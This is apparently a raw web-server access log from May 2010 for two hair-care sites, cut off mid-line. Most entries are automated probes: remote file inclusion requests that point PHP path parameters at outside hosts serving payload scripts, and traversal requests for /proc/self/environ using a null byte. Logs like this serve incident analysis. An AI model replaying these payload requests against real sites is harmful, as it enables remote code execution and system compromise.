112.216.153.186 - - [24/May/2010:19:19:09 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:09 -0700] "GET /logs/access_100125.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:09 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.216.153.186 - - [24/May/2010:19:19:10 -0700] "GET /logs/access_100125.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:12 -0700] "GET /logs/access_100125.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:12 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:37 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:45 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:49 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:19:56 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:20:01 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:20:01 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [24/May/2010:19:20:01 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:24:13 -0700] "GET /logs/access.log%20%20//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:24:13 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:24:14 -0700] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:24:40 -0700] "GET /logs/access.log%20%20//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:24:40 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:24:42 -0700] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.153.186 - - [24/May/2010:19:24:43 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.153.186 - - [24/May/2010:19:24:43 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.153.186 - - [24/May/2010:19:24:43 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:25:01 -0700] "GET /logs/access_100208.log%20%20//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:25:01 -0700] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:25:01 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:25:41 -0700] "GET /logs/access.log%20%20//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:25:41 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:25:41 -0700] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.153.186 - - [24/May/2010:19:26:14 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.216.153.186 - - [24/May/2010:19:26:14 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.216.153.186 - - [24/May/2010:19:26:14 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:27:03 -0700] "GET /logs/access_091221.log%20%20//index2.php?_zb_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:27:03 -0700] "GET /logs//index2.php?_zb_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:27:03 -0700] "GET /index2.php?_zb_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:27:08 -0700] "GET /logs/access_091221.log%20%20//index2.php?_zb_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:27:08 -0700] "GET /logs//index2.php?_zb_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:27:09 -0700] "GET /index2.php?_zb_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:27:33 -0700] "GET /index.php?option=com_dbquery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:19:28:17 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12909 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:33:12 -0700] "GET /index.php?option=com_dbquery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:34:19 -0700] "GET /logs/access.log//index.php?option=com_dbquery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:34:20 -0700] "GET /index.php?option=com_dbquery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:34:20 -0700] "GET /logs//index.php?option=com_dbquery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:35:31 -0700] "GET /logs/access_100208.log%20%20//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:35:31 -0700] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:35:31 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:19:36:29 -0700] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:36:29 -0700] "GET /logs/access.log%20%20//admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:19:36:32 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
187.45.250.72 - - [24/May/2010:19:53:04 -0700] "GET /logs/access.log%20%20/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
187.45.250.72 - - [24/May/2010:19:53:04 -0700] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
187.45.250.72 - - [24/May/2010:19:53:04 -0700] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:19:53:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13289 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
67.195.111.220 - - [24/May/2010:19:59:13 -0700] "GET /logs/access_091228.log HTTP/1.0" 200 636872 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
187.45.250.72 - - [24/May/2010:20:03:28 -0700] "GET /logs/access.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:20:07:51 -0700] "GET /logs/access.log//index.php?option=com_dbquery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:20:07:52 -0700] "GET /index.php?option=com_dbquery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:20:07:53 -0700] "GET /logs//index.php?option=com_dbquery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:20:08:34 -0700] "GET /logs/access_100125.log//index.php?option=com_dbquery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:20:11:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
94.136.60.168 - - [24/May/2010:20:12:58 -0700] "GET /logs/access_100405.log//tools/send_reminders.php?includedir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.136.60.168 - - [24/May/2010:20:12:58 -0700] "GET /tools/send_reminders.php?includedir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.136.60.168 - - [24/May/2010:20:12:58 -0700] "GET /logs//tools/send_re